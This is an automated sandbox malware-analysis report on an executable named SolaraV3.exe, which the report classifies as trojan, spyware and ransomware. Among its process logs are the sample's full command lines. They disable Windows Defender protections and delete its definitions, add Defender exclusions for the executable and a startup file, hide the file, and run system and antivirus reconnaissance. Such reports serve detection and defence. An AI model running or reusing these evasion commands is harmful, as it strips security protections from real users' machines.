Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE9C3E0	110_2_00007FF74EE9C3E0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA0374	110_2_00007FF74EEA0374
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE82360	110_2_00007FF74EE82360
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC832C	110_2_00007FF74EEC832C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7A504	110_2_00007FF74EE7A504
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB5468	110_2_00007FF74EEB5468
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE9D458	110_2_00007FF74EE9D458
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EED41CC	110_2_00007FF74EED41CC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB81CC	110_2_00007FF74EEB81CC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB2164	110_2_00007FF74EEB2164
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC1314	110_2_00007FF74EEC1314
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE742E0	110_2_00007FF74EE742E0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE8D2C0	110_2_00007FF74EE8D2C0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB02A4	110_2_00007FF74EEB02A4
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC2268	110_2_00007FF74EEC2268
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7F24C	110_2_00007FF74EE7F24C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE97244	110_2_00007FF74EE97244
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE8E21C	110_2_00007FF74EE8E21C

Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B8124BE appears 84 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B814840 appears 129 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FF6DC702710 appears 104 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B811EF6 appears 1581 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0C3512EE appears 293 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FF6DC702910 appears 34 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B812739 appears 516 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0C3BDFBF appears 88 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B814D6D appears 34 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B813012 appears 55 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B81698D appears 49 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B81688E appears 31 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0C3BE055 appears 63 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B812A09 appears 172 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B81405C appears 780 times
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: String function: 00007FF74EE88444 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: String function: 00007FF74EEB49F4 appears 53 times

Source: SolaraV3.exe

Static PE information: invalid certificate

Source: rar.exe.1.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.1.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: SolaraV3.exe	Binary or memory string: OriginalFilename vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1559590237.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000000.1559321077.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamektmutil.exej% vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibsslH vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs SolaraV3.exe
Source: SolaraV3.exe	Binary or memory string: OriginalFilename vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2052833376.00007FFB1AB18000.00000004.00000001.01000000.0000000C.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmp	Binary or memory string: OriginalFilenamelibcryptoH vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2050822213.00007FFB0C43D000.00000004.00000001.01000000.0000000E.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2051568182.00007FFB0C5EB000.00000004.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2053258667.00007FFB1BB2E000.00000004.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2050061158.00007FFB0BFE8000.00000004.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenamepython310.dll. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2051838761.00007FFB0C613000.00000004.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2053545569.00007FFB1C267000.00000004.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmp	Binary or memory string: OriginalFilenamelibsslH vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2052222811.00007FFB18B84000.00000004.00000001.01000000.00000011.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2054325875.00007FFB1E4CC000.00000004.00000001.01000000.0000000D.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000000.1564954986.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamektmutil.exej% vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2053814093.00007FFB1C3C7000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2054068816.00007FFB1E47C000.00000004.00000001.01000000.00000012.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2047749339.00007FFB0B807000.00000004.00000001.01000000.00000013.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2051258231.00007FFB0C5B7000.00000004.00000001.01000000.0000000B.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs SolaraV3.exe
Source: SolaraV3.exe	Binary or memory string: OriginalFilenamektmutil.exej% vs SolaraV3.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: Commandline size = 3647	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615

Source: libcrypto-1_1.dll.1.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9983946492448331
Source: libssl-1_1.dll.1.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9922997485632183
Source: python310.dll.1.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9992644702528288
Source: sqlite3.dll.1.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9976026860367893
Source: unicodedata.pyd.1.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9937050102833638

Source: classification engine

Classification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@199/58@4/3

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Code function: 110_2_00007FF74EE8CAFC GetLastError,FormatMessageW,

110_2_00007FF74EE8CAFC

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE8EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		110_2_00007FF74EE8EF50
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEBB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,		110_2_00007FF74EEBB57C

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Code function: 110_2_00007FF74EE93144 GetDiskFreeSpaceExW,

110_2_00007FF74EE93144

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4304:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6384:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4252:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6824:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3888:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1652:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1340:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4216:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_03

Source: C:\Users\user\Desktop\SolaraV3.exe

File created: C:\Users\user~1\AppData\Local\Temp\_MEI28842

Jump to behavior

Source: SolaraV3.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\SolaraV3.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\SolaraV3.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: SolaraV3.exe

ReversingLabs: Detection: 55%

Source: SolaraV3.exe	String found in binary or memory: set-addPolicy
Source: SolaraV3.exe	String found in binary or memory: id-cmc-addExtensions

Source: C:\Users\user\Desktop\SolaraV3.exe

File read: C:\Users\user\Desktop\SolaraV3.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SolaraV3.exe "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Users\user\Desktop\SolaraV3.exe "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
